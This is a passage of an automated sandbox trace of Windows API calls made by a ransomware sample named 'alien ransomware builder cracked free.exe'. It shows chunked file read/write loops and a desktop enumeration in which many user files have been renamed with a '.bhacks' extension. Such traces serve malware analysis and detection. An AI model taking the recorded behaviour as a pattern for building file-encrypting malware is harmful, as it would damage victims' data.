nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.308] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.308] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.308] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.308] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.310] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.310] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.310] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.310] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.311] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.311] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.311] ReadFile (in: hFile=0x33c, lpBuffer=0x24c21e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x6feb68, lpOverlapped=0x0 | out: lpBuffer=0x24c21e8*, lpNumberOfBytesRead=0x6feb68*=0x1000, lpOverlapped=0x0) returned 1 [0067.311] WriteFile (in: hFile=0x324, lpBuffer=0x24c3218*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6feac8, lpOverlapped=0x0 | out: lpBuffer=0x24c3218*, lpNumberOfBytesWritten=0x6feac8*=0x1000, lpOverlapped=0x0) returned 1 [0067.323] CloseHandle (hObject=0x33c) returned 1 [0067.324] CloseHandle (hObject=0x324) returned 1 [0067.454] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.exe", nBufferLength=0x105, lpBuffer=0x6fe640, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\alien ransomware builder cracked free.exe", lpFilePart=0x0) returned 0x41 [0067.465] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0067.465] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0067.465] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb60) returned 1 [0067.465] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*.zip", lpFindFileData=0x6fe880 | out: lpFindFileData=0x6fe880*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0067.465] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*", lpFindFileData=0x6fe790 | out: lpFindFileData=0x6fe790*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x25c9f900, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x25c9f900, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x9bed80 [0067.465] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x25c9f900, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x25c9f900, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.466] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e4518a0, ftCreationTime.dwHighDateTime=0x1d5c950, ftLastAccessTime.dwLowDateTime=0xc8577a40, ftLastAccessTime.dwHighDateTime=0x1d5c9d9, ftLastWriteTime.dwLowDateTime=0xc8577a40, ftLastWriteTime.dwHighDateTime=0x1d5c9d9, nFileSizeHigh=0x0, nFileSizeLow=0x3faa, dwReserved0=0x0, dwReserved1=0x0, cFileName="-yB2WD9ZHipl10.mkv", cAlternateFileName="-YB2WD~1.MKV")) returned 1 [0067.466] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe913c2c0, ftCreationTime.dwHighDateTime=0x1d5c821, ftLastAccessTime.dwLowDateTime=0x951b3080, ftLastAccessTime.dwHighDateTime=0x1d5cb10, ftLastWriteTime.dwLowDateTime=0x951b3080, ftLastWriteTime.dwHighDateTime=0x1d5cb10, nFileSizeHigh=0x0, nFileSizeLow=0x4b96, dwReserved0=0x0, dwReserved1=0x0, cFileName="0LCfOxpKhBY.mkv", cAlternateFileName="0LCFOX~1.MKV")) returned 1 [0067.466] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc7f6e50, ftCreationTime.dwHighDateTime=0x1d5c9da, ftLastAccessTime.dwLowDateTime=0x9744b650, ftLastAccessTime.dwHighDateTime=0x1d5c896, ftLastWriteTime.dwLowDateTime=0x9744b650, ftLastWriteTime.dwHighDateTime=0x1d5c896, nFileSizeHigh=0x0, nFileSizeLow=0x67b1, dwReserved0=0x0, dwReserved1=0x0, cFileName="63ZOACO2R_kPqlEG.m4a", cAlternateFileName="63ZOAC~1.M4A")) returned 1 [0067.466] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe41d58d0, ftCreationTime.dwHighDateTime=0x1d5cc31, ftLastAccessTime.dwLowDateTime=0xef3f2c90, ftLastAccessTime.dwHighDateTime=0x1d5c9eb, ftLastWriteTime.dwLowDateTime=0xef3f2c90, ftLastWriteTime.dwHighDateTime=0x1d5c9eb, nFileSizeHigh=0x0, nFileSizeLow=0xe243, dwReserved0=0x0, dwReserved1=0x0, cFileName="6yMUE.flv", cAlternateFileName="")) returned 1 [0067.466] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4105fa60, ftCreationTime.dwHighDateTime=0x1d5cc92, ftLastAccessTime.dwLowDateTime=0x3135af40, ftLastAccessTime.dwHighDateTime=0x1d5c931, ftLastWriteTime.dwLowDateTime=0x3135af40, ftLastWriteTime.dwHighDateTime=0x1d5c931, nFileSizeHigh=0x0, nFileSizeLow=0x8f23, dwReserved0=0x0, dwReserved1=0x0, cFileName="7jATM.wav", cAlternateFileName="")) returned 1 [0067.466] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81d84fe0, ftCreationTime.dwHighDateTime=0x1d5ca4c, ftLastAccessTime.dwLowDateTime=0x349b2b0, ftLastAccessTime.dwHighDateTime=0x1d5d1f2, ftLastWriteTime.dwLowDateTime=0x349b2b0, ftLastWriteTime.dwHighDateTime=0x1d5d1f2, nFileSizeHigh=0x0, nFileSizeLow=0xcdc4, dwReserved0=0x0, dwReserved1=0x0, cFileName="9gEE-.bmp", cAlternateFileName="")) returned 1 [0067.467] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2584d4ec, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x2584d4ec, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x25c9f900, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0xf0b30, dwReserved0=0x0, dwReserved1=0x0, cFileName="alien ransomware builder cracked free.exe.bhacks", cAlternateFileName="ALIENR~1.BHA")) returned 1 [0067.467] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2336d40, ftCreationTime.dwHighDateTime=0x1d5d3d8, ftLastAccessTime.dwLowDateTime=0xb1ce5320, ftLastAccessTime.dwHighDateTime=0x1d5d3e8, ftLastWriteTime.dwLowDateTime=0xb1ce5320, ftLastWriteTime.dwHighDateTime=0x1d5d3e8, nFileSizeHigh=0x0, nFileSizeLow=0xd39f, dwReserved0=0x0, dwReserved1=0x0, cFileName="BlDya8Gp-4HPz6uNsS.xls", cAlternateFileName="BLDYA8~1.XLS")) returned 1 [0067.467] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0067.467] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23825ba3, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23825ba3, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x23b46f90, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x4b80, dwReserved0=0x0, dwReserved1=0x0, cFileName="DqUNIlu.gif.bhacks", cAlternateFileName="DQUNIL~1.BHA")) returned 1 [0067.467] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xebefe850, ftCreationTime.dwHighDateTime=0x1d5c92c, ftLastAccessTime.dwLowDateTime=0x573996f0, ftLastAccessTime.dwHighDateTime=0x1d5d1b7, ftLastWriteTime.dwLowDateTime=0x573996f0, ftLastWriteTime.dwHighDateTime=0x1d5d1b7, nFileSizeHigh=0x0, nFileSizeLow=0x9efc, dwReserved0=0x0, dwReserved1=0x0, cFileName="E hy.wav", cAlternateFileName="EHY~1.WAV")) returned 1 [0067.467] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67baf930, ftCreationTime.dwHighDateTime=0x1d5d160, ftLastAccessTime.dwLowDateTime=0xc1284a30, ftLastAccessTime.dwHighDateTime=0x1d5d382, ftLastWriteTime.dwLowDateTime=0xc1284a30, ftLastWriteTime.dwHighDateTime=0x1d5d382, nFileSizeHigh=0x0, nFileSizeLow=0x13ea7, dwReserved0=0x0, dwReserved1=0x0, cFileName="eacUdxJuUDfuA061.xls", cAlternateFileName="EACUDX~1.XLS")) returned 1 [0067.468] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5fad9210, ftCreationTime.dwHighDateTime=0x1d5cdab, ftLastAccessTime.dwLowDateTime=0xc7ac12f0, ftLastAccessTime.dwHighDateTime=0x1d5d0c7, ftLastWriteTime.dwLowDateTime=0xc7ac12f0, ftLastWriteTime.dwHighDateTime=0x1d5d0c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ED 0nXQ VIkUvYr6", cAlternateFileName="ED0NXQ~1")) returned 1 [0067.468] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4f31cb0, ftCreationTime.dwHighDateTime=0x1d5d48c, ftLastAccessTime.dwLowDateTime=0x8a825cf0, ftLastAccessTime.dwHighDateTime=0x1d5ca63, ftLastWriteTime.dwLowDateTime=0x8a825cf0, ftLastWriteTime.dwHighDateTime=0x1d5ca63, nFileSizeHigh=0x0, nFileSizeLow=0xd9f9, dwReserved0=0x0, dwReserved1=0x0, cFileName="EkLB 1ywsMV77uH53.wav", cAlternateFileName="EKLB1Y~1.WAV")) returned 1 [0067.468] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56e63d70, ftCreationTime.dwHighDateTime=0x1d5cf5f, ftLastAccessTime.dwLowDateTime=0x61643820, ftLastAccessTime.dwHighDateTime=0x1d5cbfd, ftLastWriteTime.dwLowDateTime=0x61643820, ftLastWriteTime.dwHighDateTime=0x1d5cbfd, nFileSizeHigh=0x0, nFileSizeLow=0x11fe4, dwReserved0=0x0, dwReserved1=0x0, cFileName="ERgdUGLd4HevVs5.odt", cAlternateFileName="ERGDUG~1.ODT")) returned 1 [0067.468] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b11b8b0, ftCreationTime.dwHighDateTime=0x1d5c84e, ftLastAccessTime.dwLowDateTime=0x62c618a0, ftLastAccessTime.dwHighDateTime=0x1d5c9b9, ftLastWriteTime.dwLowDateTime=0x62c618a0, ftLastWriteTime.dwHighDateTime=0x1d5c9b9, nFileSizeHigh=0x0, nFileSizeLow=0x7189, dwReserved0=0x0, dwReserved1=0x0, cFileName="fqpL_g35J.m4a", cAlternateFileName="FQPL_G~1.M4A")) returned 1 [0067.468] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc87e190, ftCreationTime.dwHighDateTime=0x1d5d4f7, ftLastAccessTime.dwLowDateTime=0x337ee530, ftLastAccessTime.dwHighDateTime=0x1d5caa0, ftLastWriteTime.dwLowDateTime=0x337ee530, ftLastWriteTime.dwHighDateTime=0x1d5caa0, nFileSizeHigh=0x0, nFileSizeLow=0x1868d, dwReserved0=0x0, dwReserved1=0x0, cFileName="i6 iY_C6BkJ.m4a", cAlternateFileName="I6IY_C~1.M4A")) returned 1 [0067.468] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23c2351d, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23c2351d, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x23e85b50, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x10260, dwReserved0=0x0, dwReserved1=0x0, cFileName="j51yJlAI1.gif.bhacks", cAlternateFileName="J51YJL~1.BHA")) returned 1 [0067.468] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x249d9033, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x249d9033, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x24c15251, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x9420, dwReserved0=0x0, dwReserved1=0x0, cFileName="JkNoq.avi.bhacks", cAlternateFileName="JKNOQA~1.BHA")) returned 1 [0067.469] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24cfc8f3, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x24cfc8f3, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x24e51519, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0xfb70, dwReserved0=0x0, dwReserved1=0x0, cFileName="J_gUxI4K04bkqo7tW4.avi.bhacks", cAlternateFileName="J_GUXI~1.BHA")) returned 1 [0067.469] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25257692, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x25257692, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x25362701, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x4550, dwReserved0=0x0, dwReserved1=0x0, cFileName="Kz5g.mp4.bhacks", cAlternateFileName="KZ5GMP~1.BHA")) returned 1 [0067.469] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x23ef8520, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x23ef8520, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2402951c, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x2da0, dwReserved0=0x0, dwReserved1=0x0, cFileName="mCQMPnOOyUYP.gif.bhacks", cAlternateFileName="MCQMPN~1.BHA")) returned 1 [0067.469] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54866930, ftCreationTime.dwHighDateTime=0x1d5d66a, ftLastAccessTime.dwLowDateTime=0x5f4a3830, ftLastAccessTime.dwHighDateTime=0x1d5d023, ftLastWriteTime.dwLowDateTime=0x5f4a3830, ftLastWriteTime.dwHighDateTime=0x1d5d023, nFileSizeHigh=0x0, nFileSizeLow=0xecc, dwReserved0=0x0, dwReserved1=0x0, cFileName="MdUrzCG7I8VQVwhMz8.rtf", cAlternateFileName="MDURZC~1.RTF")) returned 1 [0067.469] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3022d80, ftCreationTime.dwHighDateTime=0x1d5cb0f, ftLastAccessTime.dwLowDateTime=0x7517fd0, ftLastAccessTime.dwHighDateTime=0x1d5d596, ftLastWriteTime.dwLowDateTime=0x7517fd0, ftLastWriteTime.dwHighDateTime=0x1d5d596, nFileSizeHigh=0x0, nFileSizeLow=0x80c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="MH23a5.bmp", cAlternateFileName="")) returned 1 [0067.469] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25362701, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x25362701, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2552c345, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0xb5f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nYVw1n1XTh2-sApcS7w.mp4.bhacks", cAlternateFileName="NYVW1N~1.BHA")) returned 1 [0067.470] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7910b730, ftCreationTime.dwHighDateTime=0x1d5d221, ftLastAccessTime.dwLowDateTime=0x2c63f080, ftLastAccessTime.dwHighDateTime=0x1d5cce2, ftLastWriteTime.dwLowDateTime=0x2c63f080, ftLastWriteTime.dwHighDateTime=0x1d5cce2, nFileSizeHigh=0x0, nFileSizeLow=0xd499, dwReserved0=0x0, dwReserved1=0x0, cFileName="og9u_G4EHl49Tl.flv", cAlternateFileName="OG9U_G~1.FLV")) returned 1 [0067.470] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4212db0, ftCreationTime.dwHighDateTime=0x1d5d63b, ftLastAccessTime.dwLowDateTime=0xa0b30de0, ftLastAccessTime.dwHighDateTime=0x1d5d78c, ftLastWriteTime.dwLowDateTime=0xa0b30de0, ftLastWriteTime.dwHighDateTime=0x1d5d78c, nFileSizeHigh=0x0, nFileSizeLow=0x408e, dwReserved0=0x0, dwReserved1=0x0, cFileName="QgQCsu7ShKSSIL.m4a", cAlternateFileName="QGQCSU~1.M4A")) returned 1 [0067.470] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24f82a07, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x24f82a07, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x251263f5, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x7be0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Tab3I0y Y3.avi.bhacks", cAlternateFileName="TAB3I0~1.BHA")) returned 1 [0067.470] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c10d530, ftCreationTime.dwHighDateTime=0x1d5cb12, ftLastAccessTime.dwLowDateTime=0xe28a1830, ftLastAccessTime.dwHighDateTime=0x1d5d390, ftLastWriteTime.dwLowDateTime=0xe28a1830, ftLastWriteTime.dwHighDateTime=0x1d5d390, nFileSizeHigh=0x0, nFileSizeLow=0x1e8b, dwReserved0=0x0, dwReserved1=0x0, cFileName="TtFu8ac2GuQ.mp3", cAlternateFileName="TTFU8A~1.MP3")) returned 1 [0067.470] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c15f530, ftCreationTime.dwHighDateTime=0x1d5d49d, ftLastAccessTime.dwLowDateTime=0x2fe34c90, ftLastAccessTime.dwHighDateTime=0x1d5d801, ftLastWriteTime.dwLowDateTime=0x2fe34c90, ftLastWriteTime.dwHighDateTime=0x1d5d801, nFileSizeHigh=0x0, nFileSizeLow=0x6236, dwReserved0=0x0, dwReserved1=0x0, cFileName="vY9PyxRY3.odp", cAlternateFileName="VY9PYX~1.ODP")) returned 1 [0067.470] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x241cd0f6, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x241cd0f6, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x2421963f, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x3450, dwReserved0=0x0, dwReserved1=0x0, cFileName="W3nCKPmZd6_T8yGD3CRn.jpg.bhacks", cAlternateFileName="W3NCKP~1.BHA")) returned 1 [0067.471] FindNextFileW (in: hFindFile=0x9bed80, lpFindFileData=0x6fe7c0 | out: lpFindFileData=0x6fe7c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2559e9dc, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x2559e9dc, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x256a9b70, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0xa120, dwReserved0=0x0, dwReserved1=0x0, cFileName="WLViPvkU.mp4.bhacks", cAlternateFileName="WLVIPV~1.BHA")) returned 1 [0067.471] FindClose (in: hFindFile=0x9bed80 | out: hFindFile=0x9bed80) returned 1 [0067.472] FindClose (in: hFindFile=0x9bf020 | out: hFindFile=0x9bf020) returned 1 [0067.473] FindClose (in: hFindFile=0x9beb40 | out: hFindFile=0x9beb40) returned 1 [0067.475] FindClose (in: hFindFile=0x9bf1a0 | out: hFindFile=0x9bf1a0) returned 1 [0067.475] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feaa0) returned 1 [0067.475] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6fea60) returned 1 [0067.475] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, lpBuffer=0x6fe690, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\", lpFilePart=0x0) returned 0x18 [0067.475] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6feb20) returned 1 [0067.475] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x6fec00 | out: lpFileInformation=0x6fec00*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x25c9f900, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x25c9f900, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0x3000)) returned 1 [0067.475] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6feae0) returned 1 [0067.475] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\", nBufferLength=0x105, 